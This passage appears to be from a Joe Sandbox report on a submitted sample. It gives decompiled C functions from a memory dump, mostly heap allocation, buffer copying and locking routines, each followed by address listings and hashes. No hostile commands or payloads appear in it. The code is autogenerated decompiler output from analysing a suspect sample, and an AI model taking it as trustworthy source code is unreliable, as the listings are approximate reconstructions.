						_t88 = _t88 + (( *(_t88 + _t77 + 4) & 0x0000ffff) + 0x00000007 & 0xfffffff8);
					} while (_t88 < _a8);
				}
				_t91 = E1D755D90(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t95);
				_v24 = _t91;
				if(_t91 != 0) {
					_t81 = 0;
					_v8 = 0;
					_t96 = 0;
					_v16 = _v16 + _t91;
					_t89 = 0;
					if(_a8 > 0) {
						do {
							_v12 = _v12 & 0x00000000;
							 *((intOrPtr*)(_t91 + (_t96 & 0x0000ffff) * 4)) = _v16 + (_t81 & 0x0000ffff) * 2;
							_t81 = _v8;
							if( *((intOrPtr*)(_t89 + _t77 + 0x2c)) > 0) {
								_t93 = _v20;
								do {
									_t85 = _t81 & 0x0000ffff;
									 *((short*)(_v16 + _t85 * 2)) = _v8;
									_t79 = _v12;
									 *( *((intOrPtr*)(_t93 + 0x178)) + _t85 * 4) = _t96;
									 *((short*)( *((intOrPtr*)(_t93 + 0x178)) + 2 + _t85 * 4)) = _t79;
									_t77 = _a4;
									_t81 = _v8 + 1;
									_t71 = _t79 + 1;
									_v8 = _t81;
									_v12 = _t71;
								} while ((_t71 & 0x0000ffff) <  *((intOrPtr*)(_t89 + _t77 + 0x2c)));
								_t91 = _v24;
							}
							_t96 = _t96 + 1;
							_t89 = _t89 + (( *(_t89 + _t77 + 4) & 0x0000ffff) + 0x00000007 & 0xfffffff8);
						} while (_t89 < _a8);
					}
					_t82 = _v20;
					 *(_t82 + 0x15c) = _t96 & 0x0000ffff;
					_t61 = 0;
					 *((intOrPtr*)(_t82 + 0x160)) = _t91;
				} else {
					_t61 = 0xc0000017;
				}
				return _t61;
			}






















                                                                                                                              0x1d8117bc
                                                                                                                              0x1d8117c5
                                                                                                                              0x1d8117cb
                                                                                                                              0x1d8117cd
                                                                                                                              0x1d8117d1
                                                                                                                              0x1d8117d3
                                                                                                                              0x1d8117d7
                                                                                                                              0x1d8117dd
                                                                                                                              0x1d8117df
                                                                                                                              0x1d8117e3
                                                                                                                              0x1d8117f1
                                                                                                                              0x1d8117f3
                                                                                                                              0x1d8117df
                                                                                                                              0x1d811809
                                                                                                                              0x1d81180b
                                                                                                                              0x1d811810
                                                                                                                              0x1d81181f
                                                                                                                              0x1d811823
                                                                                                                              0x1d811826
                                                                                                                              0x1d811828
                                                                                                                              0x1d81182b
                                                                                                                              0x1d811830
                                                                                                                              0x1d811832
                                                                                                                              0x1d811832
                                                                                                                              0x1d811842
                                                                                                                              0x1d81184a
                                                                                                                              0x1d81184d
                                                                                                                              0x1d81184f
                                                                                                                              0x1d811852
                                                                                                                              0x1d811858
                                                                                                                              0x1d81185b
                                                                                                                              0x1d811865
                                                                                                                              0x1d811868
                                                                                                                              0x1d811872
                                                                                                                              0x1d81187c
                                                                                                                              0x1d81187f
                                                                                                                              0x1d811880
                                                                                                                              0x1d811881
                                                                                                                              0x1d811884
                                                                                                                              0x1d81188a
                                                                                                                              0x1d811890
                                                                                                                              0x1d811890
                                                                                                                              0x1d811898
                                                                                                                              0x1d81189f
                                                                                                                              0x1d8118a1
                                                                                                                              0x1d811832
                                                                                                                              0x1d8118a6
                                                                                                                              0x1d8118ac
                                                                                                                              0x1d8118b2
                                                                                                                              0x1d8118b4
                                                                                                                              0x1d811812
                                                                                                                              0x1d811812
                                                                                                                              0x1d811812
                                                                                                                              0x1d8118be

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                              • Instruction ID: c94b784ea180ea5a8ca1efb3c6dfb45410bdb6d0b7f80d64f33961213b900b35
                                                                                                                              • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                              • Instruction Fuzzy Hash: BF318EB2E00119EFC704DF69C480AADB7B1FF98311F15C269E854DB345D734AA55CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D739D46 Relevance: .1, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E1D739D46(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t29;
				void* _t56;
				intOrPtr _t58;
				signed int _t65;
				void* _t67;
				intOrPtr* _t69;
				void* _t71;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_push(__edx);
				_v8 = __edx;
				_v12 = __ecx;
				if(E1D763D20(__edx, __edi, __ecx, __eflags) == 0) {
					_t29 = 0xc000000d;
				} else {
					_t56 =  *_t69;
					_push(__edi);
					_t65 = 0x00000017 + ( *(__edx + 1) & 0x000000ff) * 0x00000004 & 0xfffffff8;
					_t32 =  *((intOrPtr*)(_t56 + 8)) + _t65;
					if( *((intOrPtr*)(_t56 + 8)) + _t65 < _t65) {
						_t29 = 0xc0000173;
					} else {
						_t71 = E1D755D90(_t57,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
						if(_t71 == 0) {
							_t29 = 0xc000009a;
						} else {
							E1D7888C0(_t71, _t56,  *((intOrPtr*)(_t56 + 8)));
							 *((intOrPtr*)(_t71 + 8)) =  *((intOrPtr*)(_t56 + 8)) + _t65;
							 *((intOrPtr*)(_t71 + 4)) =  *((intOrPtr*)(_t56 + 4)) + 1;
							_t58 =  *((intOrPtr*)(_t56 + 8));
							 *((intOrPtr*)(_t58 + _t71)) = (0 | _a4 != 0x00000000) + 2;
							 *(_t58 + _t71 + 4) = _t65;
							E1D7888C0(_t58 + 8 + _t71, _v8, 8 + ( *(_v8 + 1) & 0x000000ff) * 4);
							_t67 = E1D7394C8(_t71);
							if(_t67 < 0) {
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t71);
								_t29 = _t67;
							} else {
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
								 *_v12 = _t71;
								_t29 = 0;
							}
						}
					}
				}
				return _t29;
			}















                                                                                                                              0x1d739d46
                                                                                                                              0x1d739d4b
                                                                                                                              0x1d739d4c
                                                                                                                              0x1d739d51
                                                                                                                              0x1d739d53
                                                                                                                              0x1d739d54
                                                                                                                              0x1d739d57
                                                                                                                              0x1d739d61
                                                                                                                              0x1d79bb94
                                                                                                                              0x1d739d67
                                                                                                                              0x1d739d6b
                                                                                                                              0x1d739d6d
                                                                                                                              0x1d739d78
                                                                                                                              0x1d739d7b
                                                                                                                              0x1d739d7f
                                                                                                                              0x1d79bb9e
                                                                                                                              0x1d739d85
                                                                                                                              0x1d739d96
                                                                                                                              0x1d739d9a
                                                                                                                              0x1d79bba8
                                                                                                                              0x1d739da0
                                                                                                                              0x1d739da5
                                                                                                                              0x1d739db2
                                                                                                                              0x1d739db9
                                                                                                                              0x1d739dc1
                                                                                                                              0x1d739dca
                                                                                                                              0x1d739dcd
                                                                                                                              0x1d739de4
                                                                                                                              0x1d739df3
                                                                                                                              0x1d739df7
                                                                                                                              0x1d79bbbf
                                                                                                                              0x1d79bbc4
                                                                                                                              0x1d739dfd
                                                                                                                              0x1d739e09
                                                                                                                              0x1d739e11
                                                                                                                              0x1d739e13
                                                                                                                              0x1d739e13
                                                                                                                              0x1d739df7
                                                                                                                              0x1d739d9a
                                                                                                                              0x1d739e15
                                                                                                                              0x1d739e19

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
                                                                                                                              • Instruction ID: 18224544ea50d8763c7a35b4808e9dc810d66bead70c19d8f749f3a4b64888c0
                                                                                                                              • Opcode Fuzzy Hash: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
                                                                                                                              • Instruction Fuzzy Hash: D031F2B2600614EFCB12CF58DC80B5ABBA9EF44624F198099A548CB352D635ED41CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7FBF4D Relevance: .1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D7FBF4D(void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t54;
				void* _t57;
				void* _t61;
				void* _t62;

				_t57 = __edx;
				_t61 = 0;
				_t62 = __ecx;
				if(__edx < 1) {
					_t57 = 4;
				}
				_t50 = _a4;
				if(_t50 < 1) {
					_t50 = 0x28;
				}
				if(_t62 != 0 && _t57 >= 1 && _t50 >= 1) {
					_t48 = _t57;
					if(_t57 >= ( *(_t62 + 6) & 0x0000ffff)) {
						_t51 = _t50;
						_v8 = _t51;
						if(_t51 >= ( *(_t62 + 0xa) & 0x0000ffff)) {
							_t52 = 2;
							if(E1D774CF8( &_v12, ( *(_t62 + 4) & 0x0000ffff) * _t52, ( *(_t62 + 4) & 0x0000ffff) * _t52 >> 0x20) >= 0) {
								_t54 = 2;
								if(E1D774CF8( &_v16, ( *(_t62 + 8) & 0x0000ffff) * _t54, ( *(_t62 + 8) & 0x0000ffff) * _t54 >> 0x20) >= 0) {
									_t61 = E1D73DB8D(_t48, _v8);
									if(_t61 != 0) {
										E1D7888C0( *((intOrPtr*)(_t61 + 0xc)),  *((intOrPtr*)(_t62 + 0xc)), _v12);
										E1D7888C0( *((intOrPtr*)(_t61 + 0x10)),  *((intOrPtr*)(_t62 + 0x10)), _v16);
										 *((short*)(_t61 + 6)) =  *(_t62 + 6);
										 *((short*)(_t61 + 0xa)) =  *(_t62 + 0xa);
										if(_a8 == 0) {
											E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
										}
									}
								}
							}
						}
					}
				}
				return _t61;
			}













                                                                                                                              0x1d7fbf4d
                                                                                                                              0x1d7fbf5b
                                                                                                                              0x1d7fbf5d
                                                                                                                              0x1d7fbf62
                                                                                                                              0x1d7fbf66
                                                                                                                              0x1d7fbf66
                                                                                                                              0x1d7fbf67
                                                                                                                              0x1d7fbf6d
                                                                                                                              0x1d7fbf71
                                                                                                                              0x1d7fbf71
                                                                                                                              0x1d7fbf74
                                                                                                                              0x1d7fbf90
                                                                                                                              0x1d7fbf95
                                                                                                                              0x1d7fbf9f
                                                                                                                              0x1d7fbfa2
                                                                                                                              0x1d7fbfa7
                                                                                                                              0x1d7fbfb3
                                                                                                                              0x1d7fbfc2
                                                                                                                              0x1d7fbfca
                                                                                                                              0x1d7fbfd9
                                                                                                                              0x1d7fbfe5
                                                                                                                              0x1d7fbfe9
                                                                                                                              0x1d7fbff4
                                                                                                                              0x1d7fc005
                                                                                                                              0x1d7fc015
                                                                                                                              0x1d7fc01d
                                                                                                                              0x1d7fc021
                                                                                                                              0x1d7fc02f
                                                                                                                              0x1d7fc02f
                                                                                                                              0x1d7fc021
                                                                                                                              0x1d7fbfe9
                                                                                                                              0x1d7fbfd9
                                                                                                                              0x1d7fbfc2
                                                                                                                              0x1d7fbfa7
                                                                                                                              0x1d7fbf95
                                                                                                                              0x1d7fc03a

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                              • Instruction ID: b3fb9019ba1d2c20a7f3abe3e24ed403ce05ff074f56a3f4a23beac55ff694f3
                                                                                                                              • Opcode Fuzzy Hash: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                                                              • Instruction Fuzzy Hash: C921AD3A600650B6CB349BD4AD44ABBBBB4EF40770F81801AFBB5CB660E330D842D761
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D771B9C Relevance: .1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E1D771B9C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1d8341e8; // 0x66
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				L1D752330(0xd, 0x939056e0);
				_t41 =  *0x1d8341e0; // 0x0
				if(_t41 != 0) {
					 *0x1d8341e0 =  *_t41;
					 *0x1d8341e4 =  *0x1d8341e4 + 0xffff;
				}
				E1D7524D0(0x939056e0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1d8341ec], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = E1D755D90(0x1d8341e8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1d8341e8]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}








                                                                                                                              0x1d771ba6
                                                                                                                              0x1d771bb2
                                                                                                                              0x1d771bb5
                                                                                                                              0x1d771bba
                                                                                                                              0x1d771ca3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d771bc0
                                                                                                                              0x1d771bc0
                                                                                                                              0x1d771bc8
                                                                                                                              0x1d771bca
                                                                                                                              0x1d771bd0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1c49
                                                                                                                              0x1d7b1c4d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b1c53
                                                                                                                              0x1d771be9
                                                                                                                              0x1d771bee
                                                                                                                              0x1d771bf6
                                                                                                                              0x1d771c84
                                                                                                                              0x1d771c8e
                                                                                                                              0x1d771c8e
                                                                                                                              0x1d771bfd
                                                                                                                              0x1d771c04
                                                                                                                              0x1d771c2d
                                                                                                                              0x1d771c3a
                                                                                                                              0x1d771c3b
                                                                                                                              0x1d771c3c
                                                                                                                              0x1d771c3d
                                                                                                                              0x1d771c3e
                                                                                                                              0x1d771c44
                                                                                                                              0x1d771c5a
                                                                                                                              0x1d771c5e
                                                                                                                              0x1d771c62
                                                                                                                              0x1d771c70
                                                                                                                              0x1d771c74
                                                                                                                              0x00000000
                                                                                                                              0x1d771c06
                                                                                                                              0x1d771c1b
                                                                                                                              0x1d771c1f
                                                                                                                              0x1d771c9a
                                                                                                                              0x1d771c9a
                                                                                                                              0x1d771c79
                                                                                                                              0x00000000
                                                                                                                              0x1d771c79
                                                                                                                              0x1d771c21
                                                                                                                              0x1d771c25
                                                                                                                              0x1d771c2b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d771c2b

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5bffbcb1fc612a87967ec0443f692bf353a627ea4b33d6ac1b59053129f9aaaf
                                                                                                                              • Instruction ID: 62be332f901b863ad8b861ae192a3be6eee3c9eafbde3e187e85ed820718abe4
                                                                                                                              • Opcode Fuzzy Hash: 5bffbcb1fc612a87967ec0443f692bf353a627ea4b33d6ac1b59053129f9aaaf
                                                                                                                              • Instruction Fuzzy Hash: AF31E37E600A21ABCB01DF9CE4C47A933B5EB28360F415A67ED48DB241E774DA45CB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D743E14 Relevance: .1, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E1D743E14(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1D744D00();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = E1D755D90(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1D744D00() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                              0x1d743e21
                                                                                                                              0x1d743e24
                                                                                                                              0x1d743e26
                                                                                                                              0x1d743e2b
                                                                                                                              0x1d743e2d
                                                                                                                              0x1d743e35
                                                                                                                              0x1d743e3e
                                                                                                                              0x1d743e3f
                                                                                                                              0x1d743e40
                                                                                                                              0x1d743e44
                                                                                                                              0x1d743e47
                                                                                                                              0x1d743e4e
                                                                                                                              0x1d743e4f
                                                                                                                              0x1d743e55
                                                                                                                              0x1d743e56
                                                                                                                              0x1d743e5d
                                                                                                                              0x1d743e77
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d743e6a
                                                                                                                              0x1d743e6f
                                                                                                                              0x1d743e6f
                                                                                                                              0x1d743e5f
                                                                                                                              0x1d743e5f
                                                                                                                              0x1d743e64
                                                                                                                              0x1d743e7b
                                                                                                                              0x1d743e80
                                                                                                                              0x1d79ffec
                                                                                                                              0x1d79fff0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79fff6
                                                                                                                              0x1d79fff6
                                                                                                                              0x1d743e89
                                                                                                                              0x1d743e8a
                                                                                                                              0x1d743e8b
                                                                                                                              0x1d743e8c
                                                                                                                              0x1d743e8e
                                                                                                                              0x1d743e8f
                                                                                                                              0x1d743e92
                                                                                                                              0x1d743e9a
                                                                                                                              0x1d7a0000
                                                                                                                              0x1d7a001a
                                                                                                                              0x1d7a001a
                                                                                                                              0x00000000
                                                                                                                              0x1d7a0000
                                                                                                                              0x1d743ea6
                                                                                                                              0x1d743eab
                                                                                                                              0x1d743eab
                                                                                                                              0x1d743e68
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                                                              • Instruction ID: 9edf3b03092c19faedc065ecdf09612bb013d19032bcc66d75c700da1848eaa7
                                                                                                                              • Opcode Fuzzy Hash: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                                                              • Instruction Fuzzy Hash: 7321B532641214FFD712CF99DC84E9BB7B9EF45A64F21805AF60997220D330ED00CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7E99D6 Relevance: .1, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E1D7E99D6(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _t37;
				void* _t45;
				intOrPtr _t48;
				char _t53;
				signed int _t58;
				intOrPtr _t62;

				_t45 = __ecx;
				_t48 =  *[fs:0x30];
				_t58 = 0;
				_v20 = __edx;
				_t53 = 1;
				_v24 = _t48;
				if(__edx != 0) {
					do {
						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0x90)) + _t58 * 4));
						if( *((intOrPtr*)(_t62 + 8)) != 0xddeeddee) {
							if(( *(_t62 + 0x40) & 0x00000001) == 0) {
								if( *((char*)(_t62 + 0xea)) != 2) {
									_t37 = 0;
								} else {
									_t37 =  *((intOrPtr*)(_t62 + 0xe4));
								}
								if(_t37 != 0) {
									if(_t45 != 0) {
										 *_t37 = _t53;
									}
									E1D7524D0(_t37);
									_t53 = 1;
								}
								if(_t45 != 0) {
									_t48 =  *((intOrPtr*)(_t62 + 0xc8));
									 *((short*)(_t62 + 0xe8)) = 0;
									 *(_t48 + 0x10) =  *(_t48 + 0x10) & 0x00000000;
									 *((intOrPtr*)(_t48 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t48 + 4)) = 0xfffffffe;
									 *((intOrPtr*)(_t48 + 8)) = _t53;
								}
								_push( *((intOrPtr*)(_t62 + 0xc8)));
								E1D74E740(_t48);
								goto L15;
							}
						} else {
							if(( *(_t62 + 0xc) & 0x00000001) == 0) {
								E1D809C1D(_t62, _t45);
								L15:
								_t48 = _v20;
								_t53 = 1;
							}
						}
						_t58 = _t58 + 1;
					} while (_t58 < _v20);
				}
				if(_t45 != 0) {
					 *0x1d834810 =  *0x1d834810 & 0x00000000;
					 *0x1d836dd8 =  *0x1d836dd8 | 0xffffffff;
					 *0x1d83480c =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					 *0x1d834804 = 0xfffffffe;
					 *0x1d834808 = _t53;
					 *0x1d836dd4 = _t53;
				}
				_v8 = 0x1d836dc8;
				_v16 = _t53;
				_v12 = 0xff;
				L1D810221();
				_push(0x1d834800);
				return E1D74E740( &_v16);
			}














                                                                                                                              0x1d7e99e4
                                                                                                                              0x1d7e99e6
                                                                                                                              0x1d7e99f1
                                                                                                                              0x1d7e99f3
                                                                                                                              0x1d7e99f7
                                                                                                                              0x1d7e99f8
                                                                                                                              0x1d7e99fe
                                                                                                                              0x1d7e9a04
                                                                                                                              0x1d7e9a0a
                                                                                                                              0x1d7e9a14
                                                                                                                              0x1d7e9a2b
                                                                                                                              0x1d7e9a34
                                                                                                                              0x1d7e9a3e
                                                                                                                              0x1d7e9a36
                                                                                                                              0x1d7e9a36
                                                                                                                              0x1d7e9a36
                                                                                                                              0x1d7e9a42
                                                                                                                              0x1d7e9a46
                                                                                                                              0x1d7e9a48
                                                                                                                              0x1d7e9a48
                                                                                                                              0x1d7e9a4b
                                                                                                                              0x1d7e9a52
                                                                                                                              0x1d7e9a52
                                                                                                                              0x1d7e9a55
                                                                                                                              0x1d7e9a57
                                                                                                                              0x1d7e9a5f
                                                                                                                              0x1d7e9a6f
                                                                                                                              0x1d7e9a73
                                                                                                                              0x1d7e9a76
                                                                                                                              0x1d7e9a7d
                                                                                                                              0x1d7e9a7d
                                                                                                                              0x1d7e9a80
                                                                                                                              0x1d7e9a86
                                                                                                                              0x00000000
                                                                                                                              0x1d7e9a86
                                                                                                                              0x1d7e9a16
                                                                                                                              0x1d7e9a1a
                                                                                                                              0x1d7e9a20
                                                                                                                              0x1d7e9a8b
                                                                                                                              0x1d7e9a8b
                                                                                                                              0x1d7e9a91
                                                                                                                              0x1d7e9a91
                                                                                                                              0x1d7e9a1a
                                                                                                                              0x1d7e9a92
                                                                                                                              0x1d7e9a93
                                                                                                                              0x1d7e9a04
                                                                                                                              0x1d7e9a9f
                                                                                                                              0x1d7e9aaa
                                                                                                                              0x1d7e9ab1
                                                                                                                              0x1d7e9ab8
                                                                                                                              0x1d7e9abd
                                                                                                                              0x1d7e9ac7
                                                                                                                              0x1d7e9acd
                                                                                                                              0x1d7e9acd
                                                                                                                              0x1d7e9ad7
                                                                                                                              0x1d7e9adf
                                                                                                                              0x1d7e9ae3
                                                                                                                              0x1d7e9ae8
                                                                                                                              0x1d7e9aed
                                                                                                                              0x1d7e9afd

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4dc60e1abbce05299e3f7a0c62ae3b70e1d3efc8ac8764efb10ef075221aba8
                                                                                                                              • Instruction ID: 19063ee5dc8bff0ae531498da27b84cb4e63fee6b3f2dfe3d4d6c8a1ce1fba85
                                                                                                                              • Opcode Fuzzy Hash: a4dc60e1abbce05299e3f7a0c62ae3b70e1d3efc8ac8764efb10ef075221aba8
                                                                                                                              • Instruction Fuzzy Hash: 54319E766047819BC311CF2EC984726B7E5EF85374F15CA2ED46D8B292DB30E846CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77D450 Relevance: .1, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E1D77D450(void* __edx, intOrPtr _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				intOrPtr _t20;
				intOrPtr _t21;
				void* _t26;
				void* _t36;
